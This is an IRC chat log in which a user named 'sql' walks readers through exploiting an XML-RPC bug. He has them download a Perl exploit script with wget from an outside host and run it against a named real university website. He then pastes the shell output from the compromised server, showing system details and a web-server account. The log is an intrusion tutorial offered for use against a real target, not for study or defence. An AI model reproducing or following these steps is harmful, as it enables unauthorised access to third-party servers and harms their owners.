How to exploit a site with XML bug?

irc.anonops.li - #bhlynx - #tutorials - sql

How to exploit a site with XML bug?

<&sql> First of all you need to have installed perl on ur OS, if you don't have use activeperl for windows, if u re using linux it's a better thing
<&sql> after it
<&sql> download this source code to ur pc
<&sql> wget http://theinvite.info/stuff/sqlxml.txt
<&sql> if u re using linux then use wget :)
<&sql> on win do it manually copy/paste to sqlxml.txt
<&sql> now lets go on
<&sql> to the funniest thing
<&sql> search ur sqlml.txt throught ur activeperl promt
<&sql> or linux console
<&sql> cd whatever
<&sql> now
<&sql> put this command when you have found it
<&sql> perl sqlxml.txt http://www.luiss.it/siti//nucleus/xmlrpc/server.php
<&sql> after that, try this command
<&sql> uname -a; id
<&sql> sql-shell@#uname -a;id
<&sql> SunOS marte 5.10 Generic_138888-08 sun4u sparc SUNW,Sun-Fire-V245
<&sql> uid=80(webservd) gid=80(webservd)
<&sql> sql-shell@#who -r
<&sql>    .       run-level 3  set 13 08:20     3      0  S
<&sql> sql-shell@#date; logname
<&sql> martedĂ¬  5 luglio 2011 13:53:33 CEST
<&sql> welcome u re in luiss.it
<&sql> that re the basic things how to get into hosts which have a vun. bug in xml.
<&sql> :)